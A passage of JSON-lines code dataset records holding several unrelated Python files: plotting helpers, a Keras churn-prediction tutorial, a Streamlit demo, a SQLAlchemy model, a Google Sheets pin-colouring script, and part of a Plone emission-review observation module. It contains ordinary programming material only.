plt.title(\"Consistency, comparing pixels\")\n plt.ylabel(\"Pixel similarity percentage\")\n # plt.savefig(SAVE_TO + \"/\" + \"consistency_summary.png\")\n plt.show()\n\n\n\ndef pixel_vs_fitness_similarity(fitness_stds, pixels_stds, title):\n plt.rcParams[\"figure.figsize\"] = [2.00, 3.50]\n # plt.rcParams[\"figure.autolayout\"] = True\n # y_f = pixel_similarities_f1\n # y_l = pixel_similarities_f2\n\n x = fitness_stds\n y = pixels_stds\n\n\n print(str(title), \", Pearson product-moment correlation coefficient: \", np.corrcoef(x, y))\n # sns.set(style='ticks', context='talk')\n # df= pd.DataFrame({'x': x, 'y': y})\n\n # sns.swarmplot('x', 'y', data=df)\n # sns.despine()\n\n plt.scatter(x, y)\n # plt.axhline(np.mean(y[:numberOfSimulations]), color='blue', linewidth=2)\n # plt.axhline(np.mean(y[numberOfSimulations:]), color='orange', linewidth=2)\n plt.plot(np.unique(x), np.poly1d(np.polyfit(x, y, 1))(np.unique(x)))\n plt.title(\"pixel_vs_fitness_similarity: \" + str(title))\n plt.xlabel(\"Fitness Similarity\")\n plt.ylabel(\"Pixel Similarity\")\n # plt.savefig(SAVE_TO + \"/\" + \"consistency_summary.png\")\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"psmiley2/Paper-1-Morphogenesis","sub_path":"simulation/generateAllGraphs.py","file_name":"generateAllGraphs.py","file_ext":"py","file_size_in_byte":29665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9908306025","text":"# Artificial Neural Network\n\n# Installing Theano\n# pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git\n\n# Installing Tensorflow\n# pip install tensorflow\n\n# Installing Keras\n# pip install --upgrade keras\n\n# Part 1 - Data Preprocessing\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Churn_Modelling.csv')\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n\n# Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n# Encode the countries\nlabelencoder_X_1 = LabelEncoder()\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\n# Encode the gender\nlabelencoder_X_2 = LabelEncoder()\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\n# One hot encode countries\nonehotencoder = OneHotEncoder(categorical_features = [1])\nX = onehotencoder.fit_transform(X).toarray()\n# Remove first dummy variable from one-hot encoded countries to avoid overfitting\n# Data still remains valid, that country is represented by 0's in the other 2 columns\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\n# Part 2 - Now let's make the ANN!\n\n# Importing the Keras libraries and packages\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\n\n# Initialising the ANN\nmodel = Sequential()\n\n# First layer includes setting up size of input layer.\n# This layer has 6 neurons\nmodel.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))\nmodel.add(Dropout(p=0.1))\n\n# Second Hidden Layer\nmodel.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\nmodel.add(Dropout(p=0.1))\n\n# Output layer, sigmoid activation\nmodel.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n\n# Compile it\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# Fit the model to the training set\nmodel.fit(x=X_train, y=y_train, batch_size=10, epochs=100)\n\n# Part 3 - Making predictions and evaluating the model\n\n# Predicting the Test set results\ny_pred = model.predict(X_test)\ny_pred = (y_pred > 0.5)\n\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n\n# HW 1\n# Geography: France = [0, 0]\n# Gender: Male = [1]\n\n\"\"\"\nGeography: France\nCredit Score: 600\nGender: Male\nAge: 40 years old\nTenure: 3 years\nBalance: $60000\nNumber of Products: 2\nDoes this customer have a credit card ? Yes\nIs this customer an Active Member: Yes\nEstimated Salary: $50000\n\"\"\"\n\nX_temp = [[0, 0, 600, 1, 40, 3, 60000, 2, 1, 1, 50000]]\nX_temp = sc.transform(X_temp)\n\nmodel.predict(X_temp)\n\n\n# Part 4 - Evaluating Model and Tuning it\n\n# Evaluate Performance\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import cross_val_score\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\ndef build_classifier():\n model = Sequential()\n \n model.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))\n model.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n model.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n \n model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n return model\n\nclassifier = KerasClassifier(build_fn=build_classifier, batch_size=10, epochs=100)\naccuracies = cross_val_score(estimator=classifier, X=X_train, y=y_train, cv=10)\n\nmean = accuracies.mean()\nvariance = accuracies.std()\n\n# Improving the ANN\n# Dropout Regularization\n\n# Tuning the ANN\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\ndef build_classifier(optimizer):\n model = Sequential()\n \n model.add(Dense(units=6, kernel_initializer='uniform', activation='relu', input_dim=11))\n model.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n model.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n \n model.compile(optimizer=optimizer, loss='binary_crossentropy', metrics=['accuracy'])\n return model\n\nclassifier = KerasClassifier(build_fn=build_classifier)\nparams = {'batch_size': [25, 32],\n 'epochs': [100, 500],\n 'optimizer': ['adam', 'rmsprop']}\ngrid_search = GridSearchCV(estimator=classifier, param_grid=params, scoring='accuracy', cv=10)\ngrid_search = grid_search.fit(X_train, y_train)\nbest_params = grid_search.best_params_\nbest_accuracy = grid_search.best_score_\n\n","repo_name":"baker-travis/udemy-deep-learning","sub_path":"Volume 1 - Supervised Deep Learning/Part 1 - Artificial Neural Networks (ANN)/Section 2 - Part 1 - ANN/Artificial_Neural_Networks/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":4927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7228584520","text":"import streamlit as st\nimport pandas as pd\nimport time\n\n#localhost and 127.0.0.1 are the same thing\n#streamlit ka ye advantage hai ki code mai koi changes karte ho toh automatic reflect ho jata hai\n#ye react ka feature hai\n\nst.title('Startup Dashboard')\nst.header('I am learning Streamlit')\nst.subheader('And I am loving it')\nst.text(\"This is a normal text\")\nst.markdown(\"\"\"\n- Race 3\n- Humshakals\n- Housefull\n\"\"\")\nst.code(\"\"\"\ndef foo(input):\n return foo**2\n\nx= foo(2) \n \"\"\")\nst.latex('x^2 + y^2 +2 =0')\n\ndf=pd.DataFrame({\n 'name': [\"Shraddha\",\"Bhakti\",\"Unkown\"],\n 'marks': [60,70,80],\n 'package': [10,12,14]\n})\n\nst.dataframe(df)\nst.metric('Revenue','Rs 3L','3%')\nst.json({\n 'name': [\"Shraddha\",\"Bhakti\",\"Unkown\"],\n 'marks': [60,70,80],\n 'package': [10,12,14]\n})\n#st.image('IMG_6353.JPG')\nst.sidebar.title(\"Love you\")\n\n#col1, col2 = st.columns(3)\n\n#with col1:\n #st.image(\"IMG_6353.JPG\")\n\n#with col2:\n #st.image(\"IMG_6353.JPG\")\n\nst.error(\"Login Failed\")\nst.success(\"Login Successfully\")\nst.info(\"This is streamlit, use wisely\")\nst.warning(\"God helps those who helps themselves\")\nbar = st.progress(0)\nfor i in range(1,101):\n time.sleep(0.1)\n bar.progress(i)\n\nemail = st.text_input('Enter Email')\nnumber = st.number_input('Enter Age')\nst.date_input('Enter registration date')\n","repo_name":"shraddha980/StarupDashboard","sub_path":"StreamlitExample.py","file_name":"StreamlitExample.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22111536668","text":"from models.db import db\nfrom datetime import datetime\n\n\nclass GetSettingResponse(db.Model):\n __tablename__ = 'getsetting_response'\n Response_ID = db.Column(db.Integer, primary_key=True, autoincrement=True)\n Getsetting_ID = db.Column(db.Integer, db.ForeignKey('getsetting.Getsetting_ID'))\n Responding_Type = db.Column(db.Integer)\n Flag = db.Column(db.String)\n SN = db.Column(db.String, unique=True)\n Command_Type = db.Column(db.Integer)\n Speed = db.Column(db.Integer)\n Recording_Cycle = db.Column(db.Integer)\n Upload_Cycle = db.Column(db.Integer)\n Fixed_Time_Upload = db.Column(db.Integer)\n Upload_Hour_1 = db.Column(db.Integer)\n Upload_Minute_1 = db.Column(db.Integer)\n Upload_Hour_2 = db.Column(db.Integer)\n Upload_Minute_2 = db.Column(db.Integer)\n Upload_Minute_3 = db.Column(db.Integer)\n Upload_Hour_3 = db.Column(db.Integer)\n Upload_Hour_4 = db.Column(db.Integer)\n Upload_Minute_4 = db.Column(db.Integer)\n Model = db.Column(db.Integer)\n Disable_Type = db.Column(db.Integer)\n Mac_Address_1 = db.Column(db.String)\n Mac_Address_2 = db.Column(db.String)\n Mac_Address_3 = db.Column(db.String)\n DateTime = db.Column(db.DateTime)\n OpenTime = db.Column(db.Time)\n CloseTime = db.Column(db.Time)\n Res_1 = db.Column(db.String)\n Res_2 = db.Column(db.String)\n Create_DateTime = db.Column(db.DateTime, default=datetime.now())\n Update_DateTime = db.Column(db.DateTime)\n\n def __init__(self, Getsetting_ID, Responding_Type, Flag, SN, Command_Type, Speed, Recording_Cycle, Upload_Cycle, Fixed_Time_Upload, Upload_Hour_1,\n Upload_Minute_1, Upload_Hour_2, Upload_Minute_2, Upload_Hour_3, Upload_Minute_3, Upload_Hour_4, Upload_Minute_4,\n Model, Disable_Type, Mac_Address_1, Mac_Address_2, Mac_Address_3, DateTime, OpenTime, CloseTime, Res_1, Res_2):\n\n self.Getsetting_ID = Getsetting_ID\n self.Responding_Type = Responding_Type\n self.Flag = Flag\n self.SN = SN\n self.Command_Type = Command_Type\n self.Speed = Speed\n self.Recording_Cycle = Recording_Cycle\n self.Upload_Cycle = Upload_Cycle\n self.Fixed_Time_Upload = Fixed_Time_Upload\n self.Upload_Hour_1 = Upload_Hour_1\n self.Upload_Minute_1 = Upload_Minute_1\n self.Upload_Hour_2 = Upload_Hour_2\n self.Upload_Minute_2 = Upload_Minute_2\n self.Upload_Hour_3 = Upload_Hour_3\n self.Upload_Minute_3 = Upload_Minute_3\n self.Upload_Hour_4 = Upload_Hour_4\n self.Upload_Minute_4 = Upload_Minute_4\n self.Model = Model\n self.Disable_Type = Disable_Type\n self.Mac_Address_1 = Mac_Address_1\n self.Mac_Address_2 = Mac_Address_2\n self.Mac_Address_3 = Mac_Address_3\n self.DateTime = DateTime\n self.OpenTime = OpenTime\n self.Res_1 = Res_1\n self.Res_2 = Res_2\n self.CloseTime = CloseTime\n self.Update_DateTime = datetime.now()\n\n\n def update(self, db, str, id):\n self.Getsetting_ID = id\n str.Responding_Type = self.Responding_Type\n str.Flag = self.Flag\n str.Command_Type = self.Command_Type\n str.Speed = self.Speed\n str.Recording_Cycle = self.Recording_Cycle\n str.Upload_Cycle = self.Upload_Cycle\n str.Fixed_Time_Upload = self.Fixed_Time_Upload\n str.Upload_Hour_1 = self.Upload_Hour_1\n str.Upload_Minute_1 = self.Upload_Minute_1\n str.Upload_Hour_2 = self.Upload_Hour_2\n str.Upload_Minute_2 = self.Upload_Minute_2\n str.Upload_Hour_3 = self.Upload_Hour_3\n str.Upload_Minute_3 = self.Upload_Minute_3\n str.Upload_Hour_4 = self.Upload_Hour_4\n str.Upload_Minute_4 = self.Upload_Minute_4\n str.Model = self.Model\n str.Disable_Type = self.Disable_Type\n str.Mac_Address_1 = self.Mac_Address_1\n str.Mac_Address_2 = self.Mac_Address_2\n str.Mac_Address_3 = self.Mac_Address_3\n str.DateTime = self.DateTime\n str.OpenTime = self.OpenTime\n str.CloseTime = self.CloseTime\n str.Res_1 = self.Res_1\n str.Res_2 = self.Res_2\n str.Update_DateTime = self.Update_DateTime\n\n db.session.commit()\n \n\n ","repo_name":"devlifestyletech/People-Counting-API","sub_path":"Python-Flask/src/models/getsetting_response.py","file_name":"getsetting_response.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9733894415","text":"from __future__ import print_function\nimport re\nfrom googleapiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\n\nre_pin_pos = re.compile('([A-Z]+)([0-9]+)')\nrow_names = 'A B C D E F G H J K L M N P R T U V W Y AA AB AC AD AE AF'.split()\nrow_dict = {}\nfor i in range(len(row_names)):\n row_dict[row_names[i]] = i;\n\ndef is_reserved(cells):\n return cells[1].startswith('VCC') or cells[3] == 'NA' or cells[3] == '0'\n\ncolor_table = {\n '13': [254, 190, 37],\n '14': [192, 215, 47],\n '15': [143, 84, 162],\n '16': [ 75, 187, 235],\n '33': [ 96, 191, 133],\n '34': [217, 139, 62],\n '35': [217, 64, 140],\n '36': [141, 140, 196]\n}\n\ndef parse_line(str):\n cells = str.split()\n m = re_pin_pos.match(cells[0])\n if is_reserved(cells):\n color = [0, 0, 0]\n elif 'MRCC' in cells[1] or 'SRCC' in cells[1]:\n color = [x/255.0 for x in color_table[cells[3]]]\n else:\n color = [1.0 - (1.0-x/255.0)/2.0 for x in color_table[cells[3]]]\n return [row_dict[m[1]], int(m[2])-1, color, cells[1]]\n\ndef read_file():\n f = open('xc7s75fgga676pkg.txt', 'r')\n str = f.read()\n lines = str.splitlines()\n while not lines[0].startswith('Pin'):\n lines = lines[1:]\n lines = lines[1:677]\n parsed = [parse_line(l) for l in lines]\n return parsed\n\ndef make_req(cells):\n return {\n 'updateCells': {\n 'rows': {\n 'values': {\n 'userEnteredFormat': {\n 'backgroundColor': {\n 'red' : cells[2][0],\n 'green': cells[2][1],\n 'blue' : cells[2][2],\n 'alpha': 0\n }\n }\n }\n },\n 'fields': 'userEnteredFormat.backgroundColor',\n 'range': {\n 'sheetId' : 0,\n 'startRowIndex' : cells[0],\n 'endRowIndex' : cells[0]+1,\n 'startColumnIndex' : cells[1],\n 'endColumnIndex' : cells[1]+1\n } \n }\n }\n\ndef send_req(requests):\n SCOPES = 'https://www.googleapis.com/auth/spreadsheets'\n store = file.Storage('token.json')\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('sheets', 'v4', http=creds.authorize(Http()))\n\n # Call the Sheets API\n SPREADSHEET_ID = '1dbaI85LP1wxyuTcN2SBk3hkD-OO9-PNyjfBb0-ARnVY'\n response = service.spreadsheets().batchUpdate(\n spreadsheetId=SPREADSHEET_ID, body={'requests': requests}).execute()\n print(response)\n\ndef main():\n table = read_file()\n requests = [make_req(x) for x in table]\n send_req(requests)\n\nmain()\n","repo_name":"yammouch/python_lesson","sub_path":"1010_gsheet/0010_xc7s75/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22361241388","text":"try:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\nimport datetime\nimport simplejson as json\nimport re\nfrom itertools import chain\nfrom functools import partial\nfrom docx import Document\nfrom docx.shared import Pt\nfrom docx.enum.style import WD_STYLE_TYPE\nfrom AccessControl import getSecurityManager\nfrom Acquisition import aq_inner\nfrom Acquisition import aq_base\nfrom Acquisition.interfaces import IAcquirer\nfrom emrt.necd.content.roles.localrolesubscriber import grant_local_roles\nfrom plone import api\nfrom plone.app.contentlisting.interfaces import IContentListing\nfrom plone.dexterity.browser import add\nfrom plone.dexterity.browser import edit\nfrom plone.dexterity.browser.view import DefaultView\nfrom plone.dexterity.interfaces import IDexterityFTI\nfrom plone.app.discussion.interfaces import IConversation\nfrom plone.dexterity.content import Container\nfrom plone.directives import form\nfrom plone.namedfile.interfaces import IImageScaleTraversable\nfrom plone.supermodel import model\nfrom plone.z3cform.interfaces import IWrappedForm\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFEditions import CMFEditionsMessageFactory as _CMFE\nfrom Products.CMFPlone.utils import safe_unicode\nfrom Products.Five import BrowserView\nfrom Products.statusmessages.interfaces import IStatusMessage\nfrom time import time\nfrom z3c.form import button\nfrom z3c.form import field\nfrom z3c.form import interfaces\nfrom z3c.form import validator\nfrom z3c.form.browser.checkbox import CheckBoxFieldWidget\nfrom z3c.form.form import Form\nfrom z3c.form.interfaces import ActionExecutionError\nimport zope.schema as schema\nfrom zope.browsermenu.menu import getMenu\nfrom zope.browserpage.viewpagetemplatefile import (\n ViewPageTemplateFile as Z3ViewPageTemplateFile\n)\nfrom zope.component import createObject\nfrom zope.component import getUtility\nfrom zope.component import getMultiAdapter\nfrom zope.event import notify\nfrom zope.i18n import translate\nfrom zope.interface import alsoProvides\nfrom zope.interface import implementer\nfrom zope.interface import Invalid\nfrom zope.lifecycleevent import ObjectModifiedEvent\nfrom emrt.necd.content import MessageFactory as _\nfrom eea.cache import cache\nfrom .comment import IComment\nfrom .commentanswer import ICommentAnswer\nfrom .nfr_code_matching import get_category_ldap_from_nfr_code\nfrom .nfr_code_matching import get_category_value_from_nfr_code\nfrom emrt.necd.content.subscriptions.interfaces import (\n INotificationUnsubscriptions\n)\nfrom emrt.necd.content.constants import LDAP_SECTOREXP\nfrom emrt.necd.content.constants import ROLE_SE\nfrom emrt.necd.content.constants import ROLE_CP\nfrom emrt.necd.content.constants import ROLE_LR\nfrom emrt.necd.content.constants import P_OBS_REDRAFT_REASON_VIEW\nfrom emrt.necd.content.constants import ROLE_MSE\nfrom emrt.necd.content.utils import get_vocabulary_value\nfrom emrt.necd.content.utils import hidden\nfrom emrt.necd.content.utils import get_user_sectors\nfrom emrt.necd.content.utilities import ms_user\nfrom emrt.necd.content.utilities.interfaces import IFollowUpPermission\nfrom emrt.necd.content.utilities.interfaces import IGetLDAPWrapper\nfrom emrt.necd.content.vocabularies import get_registry_interface_field_data\nfrom emrt.necd.content.vocabularies import INECDVocabularies\n\n# [refs #104852] Hide Projection Year and Reference Year for\n# users with these sectors.\n# [refs #134554] No longer used\nPROJECTION_HIDE_YEARS = ('sector9', )\nRE_YEAR = r'\\d{4}'\n\n\ndef projection_hide_for_user():\n # This is no longer used (#134554)\n return False\n # user = api.user.get_current()\n\n # # Managers (Secretariat) should never be excluded.\n # if 'Manager' in user.getRoles():\n # return False\n\n # user_sectors = get_user_sectors(user)\n # return set(PROJECTION_HIDE_YEARS).intersection(user_sectors)\n\n\ndef get_nfr_title_projection(fname):\n names = dict(\n nfr_code=u'Review sectors for Projections, NAPCP and PaMs',\n nfr_code_inventory=u'Review sub sectors'\n )\n return names[fname]\n\n\n# Cache helper methods\ndef _user_name(fun, self, userid):\n return (userid, time() // 86400)\n\n\ndef _is_projection(context):\n return context.type == 'projection'\n\n\ndef check_parameter(value):\n if len(value) == 0:\n raise Invalid(u'You need to select at least one parameter.')\n\n return True\n\n\ndef check_pollutants(value):\n if len(value) == 0:\n raise Invalid(u'You need to select at least one pollutant.')\n\n return True\n\n\ndef check_country(value):\n user = api.user.get_current()\n groups = user.getGroups()\n valid = False\n for group in groups:\n if group.startswith('{}-'.format(LDAP_SECTOREXP)) and \\\n group.endswith('-%s' % value):\n valid = True\n\n if not valid:\n raise Invalid(\n u'You are not allowed to add observations for this country'\n )\n\n return True\n\n\ndef inventory_year(value):\n \"\"\"\n Inventory year can be a given year (2014), a range of years (2012-2014)\n or a list of the years (2012, 2014, 2016)\n \"\"\"\n def split_on_sep(val, sep):\n for s in sep:\n if s in val:\n return tuple(val.split(s))\n return (val, )\n\n def validate(value):\n normalized_value = (val.strip() for val in split_on_sep(value, '-,;'))\n return False not in (\n int(val) in range(1000, 10000) for val in normalized_value\n )\n\n def check_valid(value):\n try:\n return validate(value)\n except ValueError:\n return False\n\n if not check_valid(value):\n raise Invalid(u'Inventory year format is not correct. ')\n\n return True\n\n\ndef default_year():\n return datetime.datetime.now().year\n\n\n# Interface class; used to define content-type schema.\nclass IObservation(model.Schema, IImageScaleTraversable):\n \"\"\"\n New review observation\n \"\"\"\n text = schema.Text(\n title=u'Short description by sector expert',\n required=True,\n description=(\n u\"Describe the issue identified. Keep it short, you cannot \"\n u\"change this description once you have sent it to LR. MS can \"\n u\"only see the question once it has been approved and sent by \"\n u\"the LR. The question to the MS should be asked in the Q&A tab, \"\n u\"not here.\"\n )\n )\n\n country = schema.Choice(\n title=u\"Country\",\n vocabulary='emrt.necd.content.eea_member_states',\n required=True,\n )\n\n nfr_code = schema.Choice(\n title=u\"NFR category codes\",\n vocabulary='emrt.necd.content.nfr_code',\n required=True,\n )\n\n nfr_code_inventory = schema.Choice(\n title=u\"NFR inventories category code\",\n vocabulary='emrt.necd.content.nfr_code_inventories',\n required=False,\n )\n\n year = schema.TextLine(\n title=u'Inventory year',\n description=u'Inventory year can be a given year (2014), a range of '\n u'years (2012-2014) or a list of the years '\n u'(2012, 2014, 2016)',\n constraint=inventory_year,\n required=True,\n )\n\n reference_year = schema.Int(\n title=u'Reference year',\n required=True,\n min=1000,\n max=9999\n )\n\n form.widget(pollutants=CheckBoxFieldWidget)\n pollutants = schema.List(\n title=u\"Pollutants\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.pollutants',\n ),\n constraint=check_pollutants,\n required=True,\n )\n\n form.widget(scenario=CheckBoxFieldWidget)\n scenario = schema.List(\n title=u\"Scenario Type\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.scenario_type'\n ),\n required=False,\n )\n\n review_year = schema.Int(\n title=u'Review year',\n description=u'Review year is the year in which the inventory was '\n u'submitted and the review was carried out',\n defaultFactory=default_year,\n required=True,\n )\n\n fuel = schema.Choice(\n title=u\"Fuel\",\n vocabulary='emrt.necd.content.fuel',\n required=False,\n )\n\n activity_data_type = schema.Choice(\n title=u\"Activity Data Type\",\n vocabulary='emrt.necd.content.activity_data_type',\n required=False,\n )\n\n form.widget(activity_data=CheckBoxFieldWidget)\n activity_data = schema.List(\n title=u\"Activity Data\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.activity_data',\n ),\n required=False,\n )\n\n ms_key_category = schema.Bool(\n title=u\"MS key category\",\n )\n\n form.widget(parameter=CheckBoxFieldWidget)\n parameter = schema.List(\n title=u\"Parameter\",\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.parameter',\n ),\n constraint=check_parameter,\n required=True,\n )\n\n form.widget(highlight=CheckBoxFieldWidget)\n highlight = schema.List(\n title=u\"Description flags\",\n description=(\n u\"Description flags highlight important information \"\n u\"that is closely related to the item.\"\n ),\n value_type=schema.Choice(\n vocabulary='emrt.necd.content.highlight',\n ),\n required=False,\n default=[],\n )\n\n form.write_permission(closing_comments='cmf.ManagePortal')\n closing_comments = schema.Text(\n title=u'Finish request comments',\n required=False,\n )\n\n form.write_permission(closing_deny_comments='cmf.ManagePortal')\n closing_deny_comments = schema.Text(\n title=u'Finish deny comments',\n required=False,\n )\n\n\nclass NfrCodeContextValidator(validator.SimpleFieldValidator):\n def validate(self, value, force=False):\n \"\"\" Check if the user is in one of the group of users\n allowed to add this category NFR Code observations\n \"\"\"\n category = get_category_ldap_from_nfr_code(value, self.context)\n user = api.user.get_current()\n groups = user.getGroups()\n if \"Manager\" not in api.user.get_roles(user=user):\n valid = False\n ldap_wrapper = getUtility(IGetLDAPWrapper)(self.context)\n ldap_se = ldap_wrapper(LDAP_SECTOREXP)\n for group in groups:\n if group.startswith('{}-{}-'.format(ldap_se, category)):\n valid = True\n break\n if not valid:\n raise Invalid(\n u'You are not allowed to add observations '\n u'for this sector category.'\n )\n\n\nvalidator.WidgetValidatorDiscriminators(\n NfrCodeContextValidator,\n field=IObservation['nfr_code']\n)\n\n\nclass CountryContextValidator(validator.SimpleFieldValidator):\n def validate(self, value):\n user = api.user.get_current()\n groups = user.getGroups()\n if \"Manager\" not in api.user.get_roles(user=user):\n valid = False\n\n ldap_wrapper = getUtility(IGetLDAPWrapper)(self.context)\n ldap_se = ldap_wrapper(LDAP_SECTOREXP)\n\n for group in groups:\n is_se = group.startswith('{}-'.format(ldap_se))\n if is_se and group.endswith('-%s' % value):\n valid = True\n break\n\n if not valid:\n raise Invalid(\n u'You are not allowed to add observations for this country.'\n )\n\n\nvalidator.WidgetValidatorDiscriminators(\n CountryContextValidator,\n field=IObservation['country']\n)\n\n\ndef set_title_to_observation(obj, event):\n sector = safe_unicode(obj.ghg_source_category_value())\n pollutants = safe_unicode(obj.pollutants_value())\n obj_year = (\n obj.year if (\n isinstance(obj.year, basestring)\n or isinstance(obj.year, int)\n )\n else ', '.join(obj.year)\n ) if obj.year else u''\n inventory_year = safe_unicode(str(obj_year))\n parameter = safe_unicode(obj.parameter_value())\n obj.title = u' '.join([sector, pollutants, inventory_year, parameter])\n grant_local_roles(obj)\n\n\ndef get_join_from_vocab(context, vocab, values):\n result = u''\n\n if values:\n get_value = partial(get_vocabulary_value, context, vocab)\n result = u', '.join([get_value(v) for v in values if v])\n\n return result\n\n\ndef get_list_from_vocab(context, vocab, values):\n result = []\n\n if values:\n get_value = partial(get_vocabulary_value, context, vocab)\n result = [get_value(v) for v in values]\n\n return result\n\n\n@implementer(IObservation)\nclass Observation(Container):\n\n def get_values(self):\n \"\"\"\n Memoized version of values, to speed-up\n \"\"\"\n return self.values()\n\n def get_values_cat(self, portal_type=None):\n if portal_type is not None:\n return self.listFolderContents(\n contentFilter={'portal_type': portal_type}\n )\n else:\n return self.listFolderContents()\n\n def get_nfr_code(self):\n \"\"\" stupid method to avoid name-clashes with the existing\n vocabularies when cataloging \"\"\"\n return self.nfr_code\n\n def get_ghg_source_sectors(self):\n \"\"\" stupid method to avoid name-clashes with the existing\n vocabularies when cataloging \"\"\"\n return self.ghg_source_sectors_value()\n\n def get_highlight(self):\n \"\"\" stupid method to avoid name-clashes with the existing\n vocabularies when cataloging \"\"\"\n return self.highlight\n\n def country_value(self):\n return get_vocabulary_value(\n self, 'emrt.necd.content.eea_member_states', self.country\n )\n\n def nfr_code_value(self):\n # Same as ghg_source_sectors_value as the object reindex\n # might be triggered by a user that doesn't have access\n # to the current nfr code, resulting in an empty value\n # getting indexed.\n return self.ghg_source_sectors_value()\n\n def ghg_source_category_value(self):\n # Get the value of the sector to be used on the LDAP mapping\n return get_category_ldap_from_nfr_code(self.nfr_code, self.aq_parent)\n\n def ghg_source_sectors_value(self):\n # Get the value of the sector to be used\n # on the Observation Metadata screen\n return get_category_value_from_nfr_code(self.nfr_code, self.aq_parent)\n\n def parameter_value(self):\n return get_join_from_vocab(\n self.aq_parent, 'emrt.necd.content.parameter', self.parameter)\n\n def pollutants_value(self):\n return get_join_from_vocab(\n self.aq_parent, 'emrt.necd.content.pollutants', self.pollutants)\n\n def activity_data_value(self):\n return get_list_from_vocab(\n self.aq_parent,\n 'emrt.necd.content.activity_data', self.activity_data)\n\n def highlight_value(self):\n return get_join_from_vocab(\n self.aq_parent, 'emrt.necd.content.highlight', self.highlight)\n\n def scenario_type_value(self):\n return get_join_from_vocab(\n self.aq_parent, 'emrt.necd.content.scenario_type', self.scenario)\n\n def finish_reason_value(self):\n return get_vocabulary_value(\n self.aq_parent,\n 'emrt.necd.content.finishobservationreasons',\n self.closing_reason\n )\n\n def finish_deny_reason_value(self):\n return get_vocabulary_value(\n self.aq_parent,\n 'emrt.necd.content.finishobservationdenyreasons',\n self.closing_deny_reason\n )\n\n def get_status(self):\n return api.content.get_state(self)\n\n def can_draft_conclusions(self):\n questions = self.get_values_cat('Question')\n if len(questions) > 0:\n q = questions[0]\n return q.get_state_api() in [\n 'draft',\n 'drafted',\n 'recalled-lr',\n 'closed',\n ]\n else:\n return True\n\n def can_close(self):\n if self.get_status() in ['pending']:\n questions = self.get_values_cat('Question')\n if len(questions) > 0:\n for q in questions:\n if q.get_state_api() not in ['closed']:\n return False\n return True\n\n return False\n\n def wf_location(self):\n status = self.get_status()\n if status in ('draft', 'conclusions', 'conclusions-lr-denied'):\n return 'Sector Expert'\n elif status == 'closed':\n return 'Lead reviewer'\n elif status == 'conclusion-discussion':\n return 'Counterpart'\n elif status == 'close-requested':\n return 'Lead reviewer'\n else:\n questions = self.get_values_cat('Question')\n if questions:\n question = questions[0]\n state = question.get_state_api()\n if state in ['draft', 'closed']:\n return 'Sector Expert'\n elif state in ['counterpart-comments']:\n return 'Counterparts'\n elif state in ['drafted', 'recalled-lr']:\n return 'Lead reviewer'\n elif state in [\n 'pending',\n 'answered',\n 'pending-answer-drafting',\n 'recalled-msa']:\n return 'Member state coordinator'\n elif state in ['expert-comments']:\n return 'Member state experts'\n else:\n return \"Sector Expert\"\n\n def wf_status(self):\n if self.get_status() in ['draft']:\n return ['Observation created', \"observationIcon\"]\n elif self.get_status() in ['closed']:\n return ['Observation finished', \"observationIcon\"]\n elif self.get_status() in ['close-requested']:\n return ['Observation finish requested', \"observationIcon\"]\n elif self.get_status() in ['conclusions', 'conclusions-lr-denied']:\n return [\"Conclusion ongoing\", \"conclusionIcon\"]\n elif self.get_status() in ['conclusion-discussion']:\n return 